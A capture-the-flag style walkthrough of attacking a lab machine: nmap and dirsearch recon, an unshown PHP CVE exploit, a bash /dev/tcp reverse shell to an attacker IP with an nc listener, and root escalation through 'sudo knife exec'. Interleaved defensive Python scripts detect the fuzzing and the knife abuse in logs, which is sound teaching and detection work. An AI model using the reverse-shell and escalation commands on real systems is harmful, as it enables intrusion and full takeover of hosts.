Let’s start with recon using nmap
nmap -sV -sS -A 10.10.10.242
Great, two ports are open. Let's check the HTTP server.
Nothing special, huh. Let's do some directory fuzzing.
python3 dirsearch.py -u 10.10.10.242
200 6KB http://10.10.10.242:80/index.php
200 6KB http://10.10.10.242:80/index.php/login
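From the server side, a directory-fuzzing run like the one above shows up as one client requesting many non-existent paths in a short time. The following added example (my own code, not part of the original writeup) parses Apache combined-format access log lines and flags any source IP that hits a threshold of distinct 404 paths inside a sliding time window. The log lines, the IPs and the threshold values are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log in Apache "combined" format. The first IP
# requests many missing paths within a few seconds (fuzzing pattern); the
# second IP is an ordinary visitor with a single stray 404.
SAMPLE_LOG = """\
10.10.16.60 - - [20/Jun/2021:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 6144 "-" "Mozilla/5.0"
10.10.16.60 - - [20/Jun/2021:10:00:01 +0000] "GET /admin HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.16.60 - - [20/Jun/2021:10:00:02 +0000] "GET /backup HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.16.60 - - [20/Jun/2021:10:00:02 +0000] "GET /config HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.16.60 - - [20/Jun/2021:10:00:03 +0000] "GET /uploads HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.16.60 - - [20/Jun/2021:10:00:04 +0000] "GET /test HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.16.60 - - [20/Jun/2021:10:00:05 +0000] "GET /old HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.16.60 - - [20/Jun/2021:10:00:06 +0000] "GET /index.php/login HTTP/1.1" 200 6144 "-" "Mozilla/5.0"
192.168.1.5 - - [20/Jun/2021:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 6144 "-" "Mozilla/5.0"
192.168.1.5 - - [20/Jun/2021:10:00:04 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0"
this line is not a valid log entry
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)


def parse_line(line):
    """Parse one combined-format line; return a dict or None if it does not match."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_fuzzers(log_text, window_seconds=60, threshold=5):
    """Return {ip: max distinct 404 paths seen within any window} for IPs
    that reach the threshold. Unparseable lines are skipped."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            events[rec["ip"]].append((rec["ts"], rec["path"]))

    window = timedelta(seconds=window_seconds)
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it covers at most window_seconds.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            distinct = {path for _, path in evs[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    for ip, count in find_fuzzers(SAMPLE_LOG).items():
        print(f"possible directory fuzzing from {ip}: {count} distinct 404 paths")
```

Only the fuzzing client is reported; the visitor with one missing favicon stays below the threshold. Counting distinct paths rather than raw 404s keeps a single broken link that is reloaded many times from triggering an alert.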
A login page?
Nope. That's just a rabbit hole: the page is still rendering index.php.
Okay, on to the next step. Let's check what technologies this website uses. I use Wappalyzer here.
Maybe there's some outdated tech? Let's check whether this PHP version has any CVE.
And fortunately, there was.
Download the exploit and execute it.
And I got a user shell.
But because this shell isn't very interactive (I can't move to other directories), I'm going to set up a reverse shell first.
nc -lvp 4242
echo "bash -i >& /dev/tcp/10.10.16.60/4242 0>&1" > /tmp/shell.sh
chmod +x /tmp/shell.sh
Okay, let's see if we can do privilege escalation. I use sudo -l as usual.
As you can see, I can execute a program called knife with sudo. Let's check out this interesting program by executing it.
There are a lot of subcommands you can use. I checked them one by one until I found something interesting.
After reading the documentation, I found something interesting about that subcommand.
Let's see if we can execute a Ruby command to gain a root shell.
sudo /usr/bin/knife exec -E "exec('/bin/bash -i')"
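Since sudo logs every command it runs, this escalation path leaves a clear trace. The following added example (my own code, not from the original writeup) parses the syslog-style lines sudo writes to auth.log on Debian/Ubuntu and reports any use of knife's exec subcommand, which evaluates Ruby, run as root through sudo. The host name, user name and log lines are constructed for the example.

```python
import re

# Constructed auth.log excerpt in the format sudo uses on Debian/Ubuntu.
# Sample lines written for this example, not logs taken from the box.
SAMPLE_AUTH_LOG = """\
Jun 20 10:03:00 web01 sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/apt update
Jun 20 10:04:50 web01 sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/knife node list
Jun 20 10:05:11 web01 sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/knife exec -E exec('/bin/bash -i')
Jun 20 10:06:30 web01 sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/knife exec /tmp/task.rb
Jun 20 10:07:00 web01 sudo:    james : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/knife exec -E puts 1
Jun 20 10:08:00 web01 sshd[1234]: Accepted publickey for james from 10.0.0.5 port 50000 ssh2
"""

# One sudo command record: timestamp, host, invoking user, target user, command line.
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sudo:\s+(?P<user>\S+) : "
    r".*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# knife subcommands that evaluate arbitrary Ruby supplied by the caller.
# Only "exec" is covered here, which is the one used in the writeup.
KNIFE_CODE_SUBCOMMANDS = {"exec"}


def parse_sudo_line(line):
    """Return a dict for a sudo command log line, or None for anything else."""
    m = SUDO_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    argv = rec["cmd"].split()
    # Basename of the executed binary and its arguments (naive whitespace split
    # is enough here because we only inspect the first argument).
    rec["binary"] = argv[0].rsplit("/", 1)[-1] if argv else ""
    rec["args"] = argv[1:]
    return rec


def is_knife_code_execution(rec):
    """True when the record runs knife with a subcommand that evaluates Ruby."""
    return (
        rec["binary"] == "knife"
        and len(rec["args"]) > 0
        and rec["args"][0] in KNIFE_CODE_SUBCOMMANDS
    )


def find_knife_exec_via_sudo(log_text):
    """Scan auth.log text and return the sudo-to-root knife exec invocations."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if rec and rec["target"] == "root" and is_knife_code_execution(rec):
            hits.append({"ts": rec["ts"], "user": rec["user"], "cmd": rec["cmd"]})
    return hits


if __name__ == "__main__":
    for hit in find_knife_exec_via_sudo(SAMPLE_AUTH_LOG):
        print(f"{hit['ts']} user={hit['user']} ran as root: {hit['cmd']}")
```

The ordinary "knife node list" run is not reported, because the rule keys on the subcommand rather than on the binary alone. A sudoers rule that names /usr/bin/knife without any arguments allows every subcommand, exec included, so the rule itself is the thing to tighten; the detector above is the compensating control for spotting the exec path while that is being done.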